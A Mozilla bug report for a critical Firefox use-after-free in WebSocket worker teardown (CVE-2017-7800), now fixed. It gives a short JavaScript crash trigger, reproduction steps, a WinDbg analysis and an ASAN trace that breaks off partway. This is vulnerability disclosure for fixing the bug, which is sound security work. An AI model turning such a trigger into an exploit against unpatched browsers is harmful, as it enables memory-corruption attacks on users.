Bug 1374047 (CVE-2017-7800)

WebSocket - Use After Free in WebSocketImpl::DisconnectInternal()

RESOLVED FIXED in Firefox -esr52

Status: RESOLVED FIXED
Severity: critical
Reported: 2 years ago
Modified: 11 days ago

People: Reporter: loobenyang, Assigned: baku

Tracking
Version: 54 Branch
Target Milestone: mozilla56
Platform: Unspecified / All
Keywords (4): crash, csectype-uaf, sec-critical, testcase
Points: ---
Bug Flags: sec-bounty +, qe-verify -

Firefox Tracking Flags: firefox-esr52 55+ fixed, firefox54 wontfix, firefox55+ fixed, firefox56+ fixed

Details
Whiteboard: [adv-main55+][adv-esr52.3+]

Attachments: 4 attachments, 1 obsolete attachment

Description (Reporter), 2 years ago
Reproduction test case (whole server code in attached file UAF_DisconnectInternal_Repro.js):

	Main page code:
		<script>
		var worker0 = new Worker("worker0.js");
		// Tear the worker down and reload the page in the same 200 ms window
		setTimeout(function(){ worker0.terminate();}, 200);
		setTimeout(function(){location.reload()},200);
		</script>
	Worker code (worker0.js):
		// Opens a WebSocket from the worker thread with a requested subprotocol
		new WebSocket("ws://localhost:12345/", "wsm1-protocol");
		
Steps to reproduce: 
	1. Run server side script UAF_DisconnectInternal_Repro.js with Node.js (node UAF_DisconnectInternal_Repro.js).
	2. Enter http://localhost:12345 in Firefox browser.

Firefox version: 54.0 (32-bit)
OS: Windows 10

Stack trace:


	(16a8.30b4): Access violation - code c0000005 (!!! second chance !!!)
	eax=00000000 ebx=18d77028 ecx=18d77028 edx=e5e5e5e5 esi=67d4b030 edi=18d76f80
	eip=65f98e0c esp=0117f1cc ebp=0117f1cc iopl=0         nv up ei ng nz na po nc
	cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010282
	xul!mozilla::RefPtrTraits<mozilla::EditTransactionBase>::Release [inlined in xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+0x12]:
	65f98e0c 8b02            mov     eax,dword ptr [edx]  ds:002b:e5e5e5e5=????????
	0:000> !analyze -v
	*******************************************************************************
	*                                                                             *
	*                        Exception Analysis                                   *
	*                                                                             *
	*******************************************************************************


	FAULTING_IP: 
	xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h @ 65]
	65f98e0c 8b02            mov     eax,dword ptr [edx]

	EXCEPTION_RECORD:  (.exr -1)
	ExceptionAddress: 65f98e0c (xul!mozilla::RefPtrTraits<mozilla::EditTransactionBase>::Release)
	   ExceptionCode: c0000005 (Access violation)
	  ExceptionFlags: 00000000
	NumberParameters: 2
	   Parameter[0]: 00000000
	   Parameter[1]: e5e5e5e5
	Attempt to read from address e5e5e5e5

	FAULTING_THREAD:  000030b4

	PROCESS_NAME:  firefox.exe

	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

	EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

	EXCEPTION_CODE_STR:  c0000005

	EXCEPTION_PARAMETER1:  00000000

	EXCEPTION_PARAMETER2:  e5e5e5e5

	FOLLOWUP_IP: 
	xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h @ 65]
	65f98e0c 8b02            mov     eax,dword ptr [edx]

	READ_ADDRESS:  e5e5e5e5 

	WATSON_BKT_PROCSTAMP:  59399e7c

	WATSON_BKT_PROCVER:  54.0.0.6368

	PROCESS_VER_PRODUCT:  Firefox

	WATSON_BKT_MODULE:  xul.dll

	WATSON_BKT_MODSTAMP:  5939a290

	WATSON_BKT_MODOFFSET:  88e0c

	WATSON_BKT_MODVER:  54.0.0.6368

	MODULE_VER_PRODUCT:  Firefox

	BUILD_VERSION_STRING:  10.0.15063.296 (WinBuild.160101.0800)

	MODLIST_WITH_TSCHKSUM_HASH:  6677a630c80a09dae24ad5f75ef967a3823bc5ff

	MODLIST_SHA1_HASH:  d474cec995c2004a6ffece945bcd0a3e7837f453

	NTGLOBALFLAG:  70

	PROCESS_BAM_CURRENT_THROTTLED: 0

	PROCESS_BAM_PREVIOUS_THROTTLED: 0

	APPLICATION_VERIFIER_FLAGS:  0

	PRODUCT_TYPE:  1

	SUITE_MASK:  784

	DUMP_TYPE:  fe

	ANALYSIS_SESSION_TIME:  06-18-2017 22:32:19.0170

	ANALYSIS_VERSION: 10.0.15063.400 x86fre

	THREAD_ATTRIBUTES: 
	OS_LOCALE:  ENA

	PROBLEM_CLASSES: 

		ID:     [0n292]
		Type:   [@ACCESS_VIOLATION]
		Class:  Addendum
		Scope:  BUCKET_ID
		Name:   Omit
		Data:   Omit
		PID:    [Unspecified]
		TID:    [0x30b4]
		Frame:  [0] : xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef

		ID:     [0n264]
		Type:   [INVALID_POINTER_READ]
		Class:  Primary
		Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
				BUCKET_ID
		Name:   Add
		Data:   Omit
		PID:    [Unspecified]
		TID:    [0x30b4]
		Frame:  [0] : xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef

		ID:     [0n94]
		Type:   [FILL_PATTERN]
		Class:  Addendum
		Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
				BUCKET_ID
		Name:   Add
		Data:   Add
				String: [e5e5e5e5]
		PID:    [0x16a8]
		TID:    [0x30b4]
		Frame:  [0] : xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef

	BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5

	DEFAULT_BUCKET_ID:  INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5

	PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

	LAST_CONTROL_TRANSFER:  from 66cb658b to 65f98e0c

	STACK_TEXT:  
	0117f1cc 66cb658b 00000000 00000000 16daeee0 xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+0x12
	0117f1fc 66cba1d4 6620c149 15ac8ec0 15ac8ef4 xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
	0117f200 6620c149 15ac8ec0 15ac8ef4 00000000 xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
	0117f214 6620c109 16daeee0 13981380 139813b4 xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
	0117f23c 6620c08d 0117f26c 6620c109 180ec050 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
	0117f244 6620c109 180ec050 0b1f5864 180ec060 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
	0117f26c 6620c08d 0117f2e4 6601f80e 180ec060 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
	0117f274 6601f80e 180ec060 03127170 03127160 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
	0117f2e4 66020701 03104200 00000000 0117f317 xul!nsThread::ProcessNextEvent+0x213
	0117f318 66068ea0 03125060 60944f31 0b1f5860 xul!mozilla::ipc::MessagePump::Run+0x72
	0117f350 66068e6f 03104200 00000001 0b1f5800 xul!MessageLoop::RunHandler+0x20
	0117f370 662d19d8 0b1f7640 00000000 0117f390 xul!MessageLoop::Run+0x19
	0117f380 662d1767 0b1f5860 0b1f7640 0117f3a4 xul!nsBaseAppShell::Run+0x34
	0117f390 662d171c 0b1f5860 0117f6f5 0c30a440 xul!nsAppShell::Run+0x26
	0117f3a4 66505f9e 0b1f7640 0117f5f8 0117f610 xul!nsAppStartup::Run+0x22
	0117f598 665069d0 03103050 0117f740 00000001 xul!XREMain::XRE_mainRun+0xa92
	0117f5d4 6658b805 00000000 0117f610 0017f740 xul!XREMain::XRE_main+0x37b
	0117f700 6658b7c7 0117f740 0117fa84 01321bdd xul!XRE_main+0x39
	0117f70c 01321bdd 00000001 03103050 0117f740 xul!mozilla::BootstrapImpl::XRE_main+0x11
	0117fa84 01325b7f 00000001 fe615d08 01718b50 firefox!wmain+0x65d
	0117facc 73b48744 00ee0000 73b48720 7b9e292a firefox!__scrt_common_main_seh+0xf9
	0117fae0 770a587d 00ee0000 7f378ec4 00000000 KERNEL32!BaseThreadInitThunk+0x24
	0117fb28 770a584d ffffffff 770c6344 00000000 ntdll!__RtlUserThreadStart+0x2f
	0117fb38 00000000 01325bf5 00ee0000 00000000 ntdll!_RtlUserThreadStart+0x1b


	THREAD_SHA1_HASH_MOD_FUNC:  c69ed9af77e0e3ae8946fbf3e674aa21f178e624

	THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  b2a6a3a18b4b25d90fe64452661d0eb068d1731a

	THREAD_SHA1_HASH_MOD:  1e517827cf137402b6881f2d4a04f0647425c5be

	FAULT_INSTR_CODE:  ff52028b

	FAULTING_SOURCE_LINE:  c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h

	FAULTING_SOURCE_FILE:  c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h

	FAULTING_SOURCE_LINE_NUMBER:  65

	SYMBOL_STACK_INDEX:  0

	SYMBOL_NAME:  xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12

	FOLLOWUP_NAME:  MachineOwner

	MODULE_NAME: xul

	IMAGE_NAME:  xul.dll

	DEBUG_FLR_IMAGE_TIMESTAMP:  5939a290

	STACK_COMMAND:  ~0s ; kb

	FAILURE_BUCKET_ID:  INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_c0000005_xul.dll!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef

	BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_xul!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef+12

	FAILURE_EXCEPTION_CODE:  c0000005

	FAILURE_IMAGE_NAME:  xul.dll

	BUCKET_ID_IMAGE_STR:  xul.dll

	FAILURE_MODULE_NAME:  xul

	BUCKET_ID_MODULE_STR:  xul

	FAILURE_FUNCTION_NAME:  RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef

	BUCKET_ID_FUNCTION_STR:  RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef

	BUCKET_ID_OFFSET:  12

	BUCKET_ID_MODTIMEDATESTAMP:  5939a290

	BUCKET_ID_MODCHECKSUM:  31298a4

	BUCKET_ID_MODVER_STR:  54.0.0.6368

	BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_

	FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

	FAILURE_SYMBOL_NAME:  xul.dll!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef

	WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/firefox.exe/54.0.0.6368/59399e7c/xul.dll/54.0.0.6368/5939a290/c0000005/00088e0c.htm?Retriage=1

	TARGET_TIME:  2017-06-18T10:33:04.000Z

	OSBUILD:  15063

	OSSERVICEPACK:  296

	SERVICEPACK_NUMBER: 0

	OS_REVISION: 0

	OSPLATFORM_TYPE:  x86

	OSNAME:  Windows 10

	OSEDITION:  Windows 10 WinNt SingleUserTS Personal

	USER_LCID:  0

	OSBUILD_TIMESTAMP:  unknown_date

	BUILDDATESTAMP_STR:  160101.0800

	BUILDLAB_STR:  WinBuild

	BUILDOSVER_STR:  10.0.15063.296

	ANALYSIS_SESSION_ELAPSED_TIME:  104d4

	ANALYSIS_SOURCE:  UM

	FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_fill_pattern_e5e5e5e5_c0000005_xul.dll!refptr_mozilla::edittransactionbase_::assign_assuming_addref

	FAILURE_ID_HASH:  {6bdf5e90-d575-dd3a-0b53-74c46bf9fa98}

	Followup:     MachineOwner
	---------

The `this` variable shows the WebSocketImpl object had been freed:

	0:000> dt this
	Local var @ edi Type mozilla::dom::WebSocketImpl*
	   +0x000 __VFN_table : 0xe5e5e5e5 
	   +0x004 __VFN_table : 0xe5e5e5e5 
	   +0x008 __VFN_table : 0xe5e5e5e5 
	   +0x00c __VFN_table : 0xe5e5e5e5 
	   +0x010 mProxy           : 0xe5e5e5e5 nsWeakReference
	   +0x014 __VFN_table : 0xe5e5e5e5 
	   +0x018 __VFN_table : 0xe5e5e5e5 
	   +0x01c mRefCnt          : mozilla::ThreadSafeAutoRefCnt
	   +0x020 mWebSocket       : RefPtr<mozilla::dom::WebSocket>
	   +0x024 mChannel         : nsCOMPtr<nsIWebSocketChannel>
	   +0x028 mIsServerSide    : ffffffffffffffe5
	   +0x029 mSecure          : ffffffffffffffe5
	   +0x02a mOnCloseScheduled : ffffffffffffffe5
	   +0x02b mFailed          : ffffffffffffffe5
	   +0x02c mDisconnectingOrDisconnected : ffffffffffffffe5
	   +0x02d mCloseEventWasClean : ffffffffffffffe5
	   +0x030 mCloseEventReason : nsString
	   +0x03c mCloseEventCode  : 0xe5e5
	   +0x040 mAsciiHost       : nsCString
	   +0x04c mPort            : 0xe5e5e5e5
	   +0x050 mResource        : nsCString
	   +0x05c mUTF16Origin     : nsString
	   +0x068 mURI             : nsCString
	   +0x074 mRequestedProtocolList : nsCString
	   +0x080 mOriginDocument  : nsCOMPtr<nsIWeakReference>
	   +0x084 mScriptFile      : nsCString
	   +0x090 mScriptLine      : 0xe5e5e5e5
	   +0x094 mScriptColumn    : 0xe5e5e5e5
	   +0x098 mInnerWindowID   : 0xe5e5e5e5`e5e5e5e5
	   +0x0a0 mWorkerPrivate   : 0xe5e5e5e5 mozilla::dom::workers::WorkerPrivate
	   +0x0a4 mWorkerHolder    : nsAutoPtr<mozilla::dom::workers::WorkerHolder>
	   +0x0a8 mWeakLoadGroup   : nsCOMPtr<nsIWeakReference>
	   +0x0ac mIsMainThread    : ffffffffffffffe5
	   +0x0b0 mMutex           : mozilla::Mutex
	   +0x0b4 mWorkerShuttingDown : ffffffffffffffe5
	   +0x0b8 mService         : RefPtr<mozilla::net::WebSocketEventService>
Comment 1 (Reporter), 2 years ago
Ran the same test case in a locally built Linux ASAN build; it did report a Use After Free:

Firefox version: 56.0a1 (2017-06-17) (64-bit)

=================================================================
==2917==ERROR: AddressSanitizer: heap-use-after-free on address 0x6130000d0388 at pc 0x7f8911403be3 bp 0x7fffcedacf50 sp 0x7fffcedacf48
READ of size 8 at 0x6130000d0388 thread T0 (Web Content)
    #0 0x7f8911403be2 in assign_assuming_AddRef /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:329:27
    #1 0x7f8911403be2 in operator= /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:600
    #2 0x7f8911403be2 in mozilla::dom::WebSocketImpl::DisconnectInternal() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:666
    #3 0x7f891147b96f in mozilla::dom::(anonymous namespace)::DisconnectInternalRunnable::MainThreadRun() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:597:5
    #4 0x7f8914b01c04 in mozilla::dom::workers::WorkerMainThreadRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:608:20
    #5 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
    #6 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #7 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
    #8 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #9 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
    #10 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #11 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #12 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
    #13 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #14 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #15 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #16 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
    #17 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
    #18 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #19 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #20 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #21 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
    #22 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #23 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
    #24 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #25 0x41da58 in _start (/home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/bin/firefox+0x41da58)

0x6130000d0388 is located 264 bytes inside of 336-byte region [0x6130000d0280,0x6130000d03d0)
freed by thread T0 (Web Content) here:
    #0 0x4bef80 in __interceptor_cfree.localalias.0 /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:45
    #1 0x7f8911400172 in operator delete /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/mozilla/mozalloc.h:218:12
    #2 0x7f8911400172 in Release /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:259
    #3 0x7f8911400172 in non-virtual thunk to mozilla::dom::WebSocketImpl::Release() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:259
    #4 0x7f890e33b4dc in ~nsCOMPtr_base /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:294:7
    #5 0x7f890e33b4dc in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/thecoder/OpenSrc/firefox/netwerk/base/nsLoadGroup.cpp:644
    #6 0x7f8911403952 in mozilla::dom::WebSocketImpl::DisconnectInternal() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:663:5
    #7 0x7f891147b96f in mozilla::dom::(anonymous namespace)::DisconnectInternalRunnable::MainThreadRun() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:597:5
    #8 0x7f8914b01c04 in mozilla::dom::workers::WorkerMainThreadRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:608:20
    #9 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
    #10 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #11 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
    #12 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #13 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
    #14 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #15 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #16 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
    #17 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #18 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #19 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #20 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
    #21 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
    #22 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #23 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #24 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #25 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
    #26 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #27 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
    #28 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T29 (DOM Worker) here:
    #0 0x4bf108 in __interceptor_malloc /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52
    #1 0x4f72dd in moz_xmalloc /home/thecoder/OpenSrc/firefox/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f8911409473 in operator new /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f8911409473 in WebSocket /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:945
    #4 0x7f8911409473 in mozilla::dom::WebSocket::ConstructorCommon(mozilla::dom::GlobalObject const&, nsAString const&, mozilla::dom::Sequence<nsString> const&, nsITransportProvider*, nsACString const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:1287
    #5 0x7f891140b3fe in mozilla::dom::WebSocket::Constructor(mozilla::dom::GlobalObject const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:986:10
    #6 0x7f89128b2000 in mozilla::dom::WebSocketBinding::_constructor(JSContext*, unsigned int, JS::Value*) /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dom/bindings/WebSocketBinding.cpp:1073:59
    #7 0x7f891a34790b in CallJSNative /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:293:15
    #8 0x7f891a34790b in CallJSNativeConstructor /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:326
    #9 0x7f891a34790b in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:573
    #10 0x7f891a32e4c8 in ConstructFromStack /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:599:12
    #11 0x7f891a32e4c8 in Interpret(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:3059
    #12 0x7f891a315250 in js::RunScript(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:410:12
    #13 0x7f891a3491cb in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:699:15
    #14 0x7f891a349a49 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:731:12
    #15 0x7f891acf3543 in Evaluate(JSContext*, js::ScopeKind, JS::Handle<JSObject*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4719:19
    #16 0x7f891acf3d2f in JS::Evaluate(JSContext*, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4784:12
    #17 0x7f8914a44959 in (anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:1969:10
    #18 0x7f8914b00077 in mozilla::dom::workers::WorkerRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:374:12
    #19 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #20 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #21 0x7f8914af0d17 in mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:5874:7
    #22 0x7f89149f2bb2 in Run /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.h:1644:12
    #23 0x7f89149f2bb2 in (anonymous namespace)::LoadAllScripts(mozilla::dom::workers::WorkerPrivate*, nsTArray<(anonymous namespace)::ScriptLoadInfo>&, bool, mozilla::dom::workers::WorkerScriptType, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:2127
    #24 0x7f89149f24b5 in mozilla::dom::workers::scriptloader::LoadMainScript(mozilla::dom::workers::WorkerPrivate*, nsAString const&, mozilla::dom::workers::WorkerScriptType, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:2245:3
    #25 0x7f8914b10d0d in (anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:586:5
    #26 0x7f8914b00077 in mozilla::dom::workers::WorkerRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:374:12
    #27 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #28 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #29 0x7f8914aea4f3 in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:5118:7
    #30 0x7f8914a36f75 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/RuntimeService.cpp:2916:9
    #31 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #32 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #33 0x7f890f22d296 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:368:5
    #34 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #35 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #36 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #37 0x7f890e17e7df in nsThread::ThreadFunc(void*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:503:5

Thread T29 (DOM Worker) created by T0 (Web Content) here:
